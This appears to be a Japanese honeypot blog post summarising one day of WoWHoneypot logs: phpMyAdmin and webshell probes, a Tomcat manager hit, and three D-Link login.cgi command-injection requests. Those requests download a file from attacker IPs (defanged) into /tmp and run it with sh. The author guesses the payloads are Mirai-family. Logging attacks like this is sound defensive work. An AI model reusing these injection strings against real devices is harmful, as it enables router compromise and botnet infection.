ハニーポット簡易分析(18日目:8/25)
Honeytrapのログがうまく取得出来ていなかった関係で WoWHoneypotの簡易分析となります。今回もApache Struts2 の脆弱性(CVE-2018-11776)(S2-057)は来ていませんでした。。。。8/25分のWoWHoneypotの簡易分析となります。
WoWHoneypotの分析(8/25)
検知数:180件
<検知パス一覧>
| URL パス | 概要 | マルウェア ダウンロード |
| / | インデックスファイルへのアクセス | × |
| /12.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /56.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /9678.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /PMA/index.php | 調査行為(DB関連) | × |
| /PMA2/index.php | 調査行為(DB関連) | × |
| /_query.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /admin/PMA/index.php | 調査行為(DB関連) | × |
| /admin/index.php | 調査行為(DB関連) | × |
| /admin/mysql/index.php | 調査行為(DB関連) | × |
| /admin/mysql2/index.php | 調査行為(DB関連) | × |
| /admin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /admin/phpmyadmin2/index.php | 調査行為(DB関連) | × |
| /admin/zkyzp.jsp | PW・ID 共にadminでのアクセス | × |
| /ak.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /ak47.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /angge.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /aotu.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /aw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cainiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /claroline/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /cmd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cmdd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cmv.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cmx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /conflg.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /data.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db__.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db_cts.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db_pma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db_session.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /dbadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /defect.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /desktop.ini.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /fack.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /favicon.ico | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /feixiang.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /fileserver/sex../../..%5Cadmin/zkyzp.jsp | PUTコマンドの試行 | × |
| /help.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /hh.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /hm.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /index.php | indexファイルへのアクセス | × |
| /infoo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /ip.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /java.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /l7.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /l8.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /lala-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /lindex.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /log.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://199[.]195[.]254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
| /lol.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /manager/html | Tomcat管理マネージャーへのアクセス | × |
| /min.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstik-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstik.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstik2.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstiks.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /mx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /myadmin/index.php | 調査行為(DB関連) | × |
| /myadmin2/index.php | 調査行為(DB関連) | × |
| /mysql-admin/index.php | 調査行為(DB関連) | × |
| /mysql/index.php | 調査行為(DB関連) | × |
| /mysqladmin/index.php | 調査行為(DB関連) | × |
| /mz.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /pe.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /phpMyAdmin.old/index.php | 調査行為(DB関連) | × |
| /phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /phpMyAdmin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /phpMyAdminold/index.php | 調査行為(DB関連) | × |
| /phpMyadmin_bak/index.php | 調査行為(DB関連) | × |
| /phpadmin/index.php | 調査行為(DB関連) | × |
| /phpma/index.php | 調査行為(DB関連) | × |
| /phpmyadmin-old/index.php | 調査行為(DB関連) | × |
| /phpmyadmin0/index.php | 調査行為(DB関連) | × |
| /phpmyadmin1/index.php | 調査行為(DB関連) | × |
| /phpmyadmin2/index.php | 調査行為(DB関連) | × |
| /phpstudy.php | 調査行為(DB関連) | × |
| /pma-old/index.php | 調査行為(DB関連) | × |
| /pmamy/index.php | 調査行為(DB関連) | × |
| /pmamy2/index.php | 調査行為(DB関連) | × |
| /pmd/index.php | 調査行為(DB関連) | × |
| /q.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /qaq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /qq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /s.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /sheep.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /ssaa.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /system.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /test.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /text.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /tools/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /typo3/phpmyadmin/index.php | 調査行為(DB関連) | × |
| /uploader.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /w.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wanan.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wc.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /web/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /webdav/ | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /webslee.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /weixiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wp-config.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wpo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wuwu11.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /www/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /x.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xampp/phpmyadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xiaoma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xw1.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /yao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /yumo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /z.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /zuoshou.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
<マルウェアダウンロード>
D-Linkの脆弱性を狙った攻撃を検知していますが、おそらくMirai系だと思います。時間があるときにここらのマルウェアは分析したいですね。
・wget hxxp://176[.]32[.]32[.]156/bin
→VirusTotal
・wget hxxp://199[.]195[.]254[.]118/dlink
・wget hxxp://209[.]141[.]33[.]86/d
→VirusTotal
以上、簡易分析となります。
